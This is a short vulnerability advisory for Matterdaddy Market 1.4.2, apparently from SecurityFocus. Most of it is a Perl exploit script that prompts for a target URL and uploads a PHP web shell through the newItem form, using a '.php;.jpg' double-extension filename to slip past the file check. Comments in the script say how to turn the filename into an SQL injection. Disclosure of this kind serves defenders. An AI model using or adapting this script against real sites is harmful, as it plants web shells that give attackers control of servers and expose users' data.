source: https://www.securityfocus.com/bid/60150/info
Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
Content_Type => 'multipart/form-data',
Content =>
[
'md_title' => '1337day',
'md_description' => 'Inj3ct0r Exploit Database',
'md_price' => '0',
'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
'city' => 'Hassi Messaoud',
'namer' => 'KedAns-Dz',
'category' => '4',
'filetoupload' => $file,
'filename' => 'k3dsh3ll.php;.jpg',
# to make this exploit as sqli change file name to :
# k3dsh3ll' [+ SQLi +].php.jpg
# use temperdata better ;)
] );
print "\n";
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
